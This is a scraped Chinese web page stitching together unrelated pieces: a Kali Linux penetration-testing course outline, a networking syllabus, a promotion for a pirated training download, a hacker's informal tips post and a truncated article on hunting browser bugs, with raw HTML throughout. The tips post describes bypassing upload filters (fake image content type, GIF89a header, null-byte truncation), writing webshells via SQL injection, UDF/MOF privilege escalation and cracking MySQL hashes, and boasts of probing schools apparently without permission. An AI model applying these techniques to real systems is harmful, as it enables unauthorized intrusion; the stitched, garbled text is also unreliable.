-----------&br&维持访问
远程WEB管理端口&br&维持访问
家用路由器XSS/CSRF攻击&br&&br&&br&Kali Linux渗透测试系列课程:&br&课程说明
课程介绍与说明&br&-----------
-----------&br&初识Kali
VMware安装kali linux&br&初识Kali
Kali Linux安装vmware tools&br&初识Kali
Kali Linux安装中文输入法&br&初识Kali
Kali Linux美化&br&-----------
-----------&br&信息收集
DNS收集分析之dnsdict6&br&信息收集
DNS收集分析之dnsmap&br&信息收集
DNS收集分析之fierce&br&信息收集
DNS收集分析之dnsrecon&br&信息收集
DNS收集分析之lbd&br&信息收集
DNS收集分析之host&br&信息收集
DNS收集分析之reverseraider&br&信息收集
DNS收集分析之dig&br&信息收集
DNS收集分析之DMitry&br&信息收集
DNS收集分析之dnsenum&br&信息收集
网络扫描之traceroute/tracert&br&信息收集
网络扫描之tctrace&br&信息收集
搜索引擎收集信息之Metagoofil&br&信息收集
搜索引擎收集信息之GHDB&br&信息收集
搜索引擎收集信息之goohost&br&信息收集
搜索引擎收集信息之goofile&br&信息收集
搜索引擎收集信息之fimap&br&信息收集
搜索引擎收集信息之theharvester&br&信息收集
综合信息搜集--maltgo&br&-----------
-----------&br&识别阶段
判断存活主机之ping&br&判断存活
判断存活主机之nping&br&判断存活
判断存活主机之arping&br&判断存活
判断存活主机之nbtscan&br&判断存活
判断存活主机之alive6&br&判断存活
判断存活主机之detect-new-ip6&br&判断存活
判断存活主机之passive_discovery6&br&-----------
-----------&br&目标识别
目标识别之snmcheck&br&目标识别
目标识别之Unicornscan&br&目标识别
目标识别之nbtscan&br&目标识别
目标识别之onesixtyone&br&目标识别
目标识别之p0f&br&目标识别
目标识别之xprobe2&br&目标识别
目标识别之theharvester&br&-----------
-----------&br&提升阶段
WEB漏洞扫描
使用httrack克隆网站&br&WEB漏洞扫描
使用skipfish进行WEB漏洞扫描&br&WEB漏洞扫描
使用whatweb进行WEB漏洞扫描&br&WEB漏洞扫描
使用owasp进行WEB漏洞扫描&br&WEB漏洞扫描
使用joomscan进行WEB漏洞扫描&br&WEB漏洞扫描
使用wpascan进行WEB漏洞扫描&br&WEB漏洞扫描
使用Vega进行WEB漏洞扫描&br&-----------
-----------&br&漏洞评估
Nessus6的安装&br&漏洞评估
Nessus漏洞扫描&br&-----------
-----------&br&漏洞利用
初识metasploit&br&漏洞利用
metasploit离线攻击&br&漏洞利用
metasploit在线攻击&br&漏洞利用
初识meterpreter&br&-----------
-----------&br&密码攻击
密码破解之hydra在线攻击&br&密码攻击
密码破解之hashcat离线攻击&br&密码攻击
密码破解之zip密码破解&br&密码攻击
密码破解之rar密码破解&br&密码攻击
密码破解之medusa离线攻击&br&密码攻击
字典生成之crunch&br&密码攻击
字典生成之cewl在线密码生成&br&-----------
-----------&br&高级阶段
安卓逆向--apktool&br&安卓逆向
安卓逆向--dex2jar&br&-----------
-----------&br&权限提升
漏洞提权---使用metasploit&br&权限提升
配置缺陷提权&br&权限提升
弱口令提权&br&权限提升
MITM嗅探攻击提权&br&权限提升
Meterpreter提权&br&-----------
-----------&br&社会工程学攻击
SET钓鱼攻击&br&社会工程学攻击
SET实现Java applet攻击&br&社会工程学攻击
SET的PowerShell攻击向量&br&-----------
-----------&br&内网安全
内网安全之ARP欺骗攻击&br&内网安全
内网安全之DNS欺骗攻击&br&内网安全
内网安全之使用Setoolkit&br&内网安全
内网安全之截获图片流量&br&-----------
-----------&br&维持访问
隧道封装之ping tunnel&br&维持访问
系统后门之Netcat&br&维持访问
WEB后门之php meterpreter&br&&br&&br&&br&计算机网络原理&br&网络基础
01_what is network初识网络&br&网络基础
02_OSI和TCP/IP网络模型&br&理解二层
03_初识网络设备(Router/Switch)&br&理解二层
04_认识以太网&br&理解二层
05_以太网设备的工作原理&br&理解二层
06_认识局域网&br&Layer 3 Technologies
07_网络层IPv4地址和subnet&br&理解三层
08_地址解析协议(ARP)与三层包交付过程&br&理解三层
09_可变长的子网掩码(VLSM)&br&Routing & Packet
10_路由转发原理&br&路由转发
11_使用静态路由和默认路由&br&路由转发
12_介绍动态路由协议&br&Switching & Frame
13_认识VLAN和交换口模式&br&二层交换
14_交换机冗余防环--生成树协议&br&二层交换
15_网关级别的冗余备份&br&Infrastructure Security & Services
16_实现访问控制(ACL)&br&Services
17_网络地址转换(NAT)&br&IP version 6
18_初识IPv6&/p&
爱安全价值1800渗透培训教程(全套无密) 下载地址: 黑/白盒渗透测试: 安全工具篇 Nmap 01_初识Nmap Nmap 02_Nmap 主机发现扫描技术 Nmap 03_Nmap 扫描目标详解 Nmap 04_Nmap 端口扫描技术 Nmap 05_Nmap 扫描结果详解 Nmap 06_Nmap 服务…
&figure&&img src=&https://pic3.zhimg.com/v2-da4dede91d2b5fedb2084_b.jpg& data-rawwidth=&1478& data-rawheight=&610& class=&origin_image zh-lightbox-thumb& width=&1478& data-original=&https://pic3.zhimg.com/v2-da4dede91d2b5fedb2084_r.jpg&&&/figure&&p&最近刚加入漏洞银行,忙着刷洞。核心大部分都是拖儿带女的。 也比较忙。没办法。文章就交给我这种自由职业者啦。也没啥好写的。就写写经验吧。&/p&&p&经验不多。希望各位勿喷。(讲到的我现在有就截图了,没有就文字表达。还有就是,想到哪讲到哪,没有次序。谢谢。)&/p&&p&比如一个站,首先审查元素查看一下包。例如:&/p&&p&审查元素-
-刷新&/p&&p&&figure&&img src=&https://pic3.zhimg.com/v2-da4dede91d2b5fedb2084_b.jpg& data-rawwidth=&1478& data-rawheight=&610& class=&origin_image zh-lightbox-thumb& width=&1478& data-original=&https://pic3.zhimg.com/v2-da4dede91d2b5fedb2084_r.jpg&&&/figure&然后点击进去看看是否存在waf啥的。因为一般都可以看出来。&br&&/p&&figure&&img src=&https://pic4.zhimg.com/v2-92099d9ccfac04023fdea84e70a75521_b.jpg& data-rawwidth=&1236& data-rawheight=&409& class=&origin_image zh-lightbox-thumb& width=&1236& data-original=&https://pic4.zhimg.com/v2-92099d9ccfac04023fdea84e70a75521_r.jpg&&&/figure&&br&&p&然后顺带也可以看出是什么脚本语言,可以对症下药。&/p&&p&IP,邮箱啥的我一般不去看。我个人只是在后期用到。前面bugscan直接啥都扫出来了。&/p&&p&站长之家查下服务器环境或者审查元素看。&/p&&p&检测是否存在解析漏洞之类的。比如dz的话我会首先试一下/.PHP,毕竟解析漏洞。
&/p&&p&然后目录,目录很重要。曾经我的母校。 很难日。后来无意中用御剑扫了下 目录,发现越权然后有新利用点才拿下。 &/p&&p&sql注入的话, 先--is-dba查看一下权限。如果为root权限。想办法找路径直接写shell进去。 权限大直接提权了。 &/p&&br&&p&还有就是post注入,你输入个'说不定就报错了呢。 我是凭感觉来的。觉得什么地方有注入就操起sqlmap注入起来。前段时间长沙这边四大名校之一。看了下凭感觉有post注入。直接草起sqlmap。然而请看截图:&/p&&figure&&img src=&https://pic3.zhimg.com/v2-89c96bf17bd993fd47b92756cfdbc295_b.jpg& data-rawwidth=&677& data-rawheight=&522& class=&origin_image zh-lightbox-thumb& width=&677& data-original=&https://pic3.zhimg.com/v2-89c96bf17bd993fd47b92756cfdbc295_r.jpg&&&/figure&&p&这猜解真心太慢了。等了几个小时了。&/p&&p&但是还是得一步步来嘛。搞渗透不能急。有些地方不懂的就百度。你以为大牛真的所有东西都精通呢。其实也不是。 遇上xx问题时也得百度。 &/p&&p&如果是扫到越权,查看一下源代码,说不定会有些后台其他页面不在你的视野里但是却在源代码里呢。
说不定其他页面也可以越权呢。那岂不是就成功一大半了。&/p&&p&然后讲什么呢。我想想....&/p&&p&哦对,目录遍历之类的漏洞。
像目录遍历这种漏洞,千万不能急了。 先看看自己觉得比较敏感的目录,然后一个一个翻。 说不定哪一下某敏感页面或者某数据库就被你翻出来了呢。 &/p&&p&对了,还得说说最有可能出现注入的一些地方。比如一些输入框,查询啥的。 然后url啥的。一些输入框有时候真的是屡试不爽。弱口令那些我倒是不说了。
&/p&&p&关于一些网站后台查找的话,猜解+爬行。至于百度谷歌的话。一些大型站都比较难搜索到。 哦对了,说起后台查找。忘记一个重要的了。&/p&&p&robots.txt这个文件。很敏感。 有些可以直接让你知道是什么cms.甚至有子站,放在这里的子站肯定是不让查看的。还有后台啥的。&/p&&p&如果遇上不经常遇上的cms。那么建议你百度。比如xx oa系统,xx 信息管理系统之类的。 很多都是百试百灵。
如果不灵,那么你另找方法吧。&/p&&br&&p&现在讲讲上传, 上传的话,如果有些上传点, url为:&a href=&https://link.zhihu.com/?target=http%3A//xxx.com/upload.php%3Fxxx%3Dxx%26filename%3Dxxx%26xxx%3Djpg& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&xxx.com/upload.php?&/span&&span class=&invisible&&xxx=xx&filename=xxx&xxx=jpg&/span&&span class=&ellipsis&&&/span&&/a&啥的。我估计是没戏。遇上不少。没一个成功的,改jpg,改filename,都试过。burp也试过。屡试屡败。真心跪了。有些上传点,是js验证。使用burp中继秒过一下就好。 图片验证或者是内容验证,例如某ctf的测试题,上传。
&/p&&figure&&img src=&https://pic1.zhimg.com/v2-55b760b83d1f80a61c69_b.jpg& data-rawwidth=&571& data-rawheight=&226& class=&origin_image zh-lightbox-thumb& width=&571& data-original=&https://pic1.zhimg.com/v2-55b760b83d1f80a61c69_r.jpg&&&/figure&&p&请直接上传php文件。what?这么好。那么上传试试&/p&&figure&&img src=&https://pic4.zhimg.com/v2-f8acaa63fbfa6092eecb431bc229d2db_b.jpg& data-rawwidth=&495& data-rawheight=&323& class=&origin_image zh-lightbox-thumb& width=&495& data-original=&https://pic4.zhimg.com/v2-f8acaa63fbfa6092eecb431bc229d2db_r.jpg&&&/figure&&p&又要你上传php文件,但是又限制你要上传图片。 &/p&&p&限制绕过方法有两个。&/p&&p&第一个,更改包的文件类型。&/p&&p&上传php文件,把文件类型改成images/JPEG即可上传成功。
&/p&&p&或者是把文件头改一下。添加上GIf89a为图片类型文件。&/p&&p&然后是00截断。不多说了。&/p&&p&讲一下提权方面。&/p&&p&如果拿下一个webshell.我首先得看看是否能执行命令。缺少了啥。 缺少cmd?上cmd. 大马不能修改cmd路径怎么办?中国菜刀砍死他。&/p&&p&systeminfo查看补丁。补丁太多拿不下的话。试试udf和mof。udf提权我过段时间会在漏洞银行技术1群讲课。欢迎到时候大家来听。&/p&&p&读取user.MYD破解hash值啥的。
先就讲这么多吧。下次继续讲。今天累了,得休息了。&/p&
最近刚加入漏洞银行,忙着刷洞。核心大部分都是拖儿带女的。 也比较忙。没办法。文章就交给我这种自由职业者啦。也没啥好写的。就写写经验吧。经验不多。希望各位勿喷。(讲到的我现在有就截图了,没有就文字表达。还有就是,想到哪讲到哪,没有次序。谢谢…
&figure&&img src=&https://pic4.zhimg.com/v2-a72d7f79e57a6b71cc2b_b.jpg& data-rawwidth=&1443& data-rawheight=&802& class=&origin_image zh-lightbox-thumb& width=&1443& data-original=&https://pic4.zhimg.com/v2-a72d7f79e57a6b71cc2b_r.jpg&&&/figure&&p&在 Web 安全中,服务端一直扮演着十分重要的角色。然而浏览器的问题也不容小觑,它也会导致信息泄露等诸如此类的问题。然而许多人还没有意识到浏览器对于安全的重要性。在这篇讲座(文章)中,我们会给读者带来挖掘浏览器漏洞的思路。&/p&&h2&&b&挖掘漏洞的思路&/b&&/h2&&h2&&b&确定目标&/b&&/h2&&p&我们先来看看浏览器的大概结构:&/p&&ul&&li&DOM 解析 (HTML, XML, SVG, MathML, XUL)&/li&&li&脚本处理 (JavaScript, VBScript, asm.js, WebAssembly)&/li&&li&协议支持 (HTTP, FTP, WebSocket, HTTP/2, QUIC, DNS, mDNS, WebRTC)&/li&&li&媒体流支持 (JPG, GIF, PNG, WebM, Ogg, AAC, MP3, MP4, FLAC)&/li&&li&包含的中间件(Skia, ffmpeg, ICU, NSS, OpenVR, libpng, sqlite)&/li&&li&各种 API(Fetch API, Push API, Extension API, Fullscreen API, Web Speech API)&/li&&li&UI 组建(Location Bar, History, Bookmark, Context Menu)&/li&&li&安全功能(SOP, XSS Filter, CSP, SRI, TLS, Mixed Content, HSTS, HPKP, CT)&/li&&li&便利功能(Chrome Extension, Reading View, Secret Mode)&/li&&li&其它&/li&&/ul&&p&我们应该如何从诸多功能中选取攻击目标?这时,我们可以这样入手:&/p&&h2&&b&检查新功能&/b&&/h2&&p&刚刚公布的功能往往没有被太多的人研究,因此更有可能存在潜在的隐患。因此,我们可以试着在下列产品挖掘漏洞:&/p&&ul&&li&Firefox Nightly&/li&&li&Chrome Dev, Canary&/li&&li&Safari Technology Preview&/li&&li&Edge的最新版本&/li&&/ul&&p&更新时,我们最好注意一下它们的发行日记或者开发者的 blog。这样我们可以在最短的时间内得知新加入的特性。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-a72d7f79e57a6b71cc2b_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1443& data-rawheight=&802& class=&origin_image zh-lightbox-thumb& width=&1443& data-original=&https://pic4.zhimg.com/v2-a72d7f79e57a6b71cc2b_r.jpg&&&/figure&&p&Firefox 在该版本中提供了 link 预加载,这看上去十分有趣!这时,白帽子们可以以此功能为基础,对其进行安全检测,或者思考能否用它扩展供给面。&/p&&p&这是能让我们获取一手消息的相关平台:&/p&&figure&&img src=&https://pic2.zhimg.com/v2-d40caea4feadfe3a02b054646eca5ce3_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1414& data-rawheight=&800& class=&origin_image zh-lightbox-thumb& width=&1414& data-original=&https://pic2.zhimg.com/v2-d40caea4feadfe3a02b054646eca5ce3_r.jpg&&&/figure&&p&&br&&/p&&figure&&img src=&https://pic3.zhimg.com/v2-2924dbf4aa1_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1422& data-rawheight=&796& class=&origin_image zh-lightbox-thumb& width=&1422& data-original=&https://pic3.zhimg.com/v2-2924dbf4aa1_r.jpg&&&/figure&&p&&br&&/p&&figure&&img src=&https://pic2.zhimg.com/v2-38275fbaa221dddae9e46d09d8cc6983_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1419& data-rawheight=&800& class=&origin_image zh-lightbox-thumb& width=&1419& data-original=&https://pic2.zhimg.com/v2-38275fbaa221dddae9e46d09d8cc6983_r.jpg&&&/figure&&p&&br&&/p&&figure&&img src=&https://pic3.zhimg.com/v2-cc32b6a535fdfe87e3add_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1296& data-rawheight=&725& class=&origin_image zh-lightbox-thumb& width=&1296& data-original=&https://pic3.zhimg.com/v2-cc32b6a535fdfe87e3add_r.jpg&&&/figure&&p&&br&&/p&&h2&&b&检查冷门的老功能&/b&&/h2&&p&这些功能常常不被人们重视:&/p&&ul&&li&非标准化功能&/li&&li&冷门功能&/li&&li&常规插件&/li&&/ul&&p&同样地,我们也可以通过发行记录,或者从已有的研究报告中来探索这些功能。&/p&&p&打个比方:&/p&&figure&&img src=&https://pic1.zhimg.com/v2-1b282742cbc694cbd423b4c1044cbac9_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&864& data-rawheight=&656& class=&origin_image zh-lightbox-thumb& width=&864& data-original=&https://pic1.zhimg.com/v2-1b282742cbc694cbd423b4c1044cbac9_r.jpg&&&/figure&&p&我用 dialogArguments/returnValue 时,发现数据可以传输到任意窗口,此处是否有 SOP 绕过漏洞呢?&/p&&p&在用 Dailog 时,用户不能操作其它窗口,这有没有可能引发 UI 相关的问题呢?&/p&&h2&&b&枚举法 — 延伸已经存在的漏洞&/b&&/h2&&p&我们可以去挖掘一下常见机制的问题:&/p&&ul&&li&JavaScript 的 HTTP 通信机制(sendBeacon,Fetch,Worker)&/li&&li&浏览器弹窗机制(alert,confirm,getUserMedia)&/li&&li&MIME 类型(text / javascript, image / svg + xml, application / octet-stream ...)&/li&&/ul&&p&研究已经被列为高危的功能也很奏效:&/p&&ul&&li&windows 对象&/li&&li&HTTP 泄露&/li&&li&HTML5 Security Cheatsheet&/li&&/ul&&figure&&img src=&https://pic1.zhimg.com/v2-70f4c79d48f1a6e95a6b857dcef07332_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1390& data-rawheight=&793& class=&origin_image zh-lightbox-thumb& width=&1390& data-original=&https://pic1.zhimg.com/v2-70f4c79d48f1a6e95a6b857dcef07332_r.jpg&&&/figure&&p&&br&&/p&&p&通过枚举法,我们能更好地集中到有效目标上。比方说:&/p&&figure&&img src=&https://pic1.zhimg.com/v2-cbcfe3fee9a0_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1403& data-rawheight=&797& class=&origin_image zh-lightbox-thumb& width=&1403& data-original=&https://pic1.zhimg.com/v2-cbcfe3fee9a0_r.jpg&&&/figure&&p&在这里,我们可以得知IE可以运行 CSS 里的脚本,这是否意味着我们可以用它来进行 XSS 或者过滤器绕过呢?&/p&&h2&&b&从 commit 历史中挖掘漏洞&/b&&/h2&&p&我们可以通过 gi

我要回帖

更多关于 go语言 pdf 的文章

 

随机推荐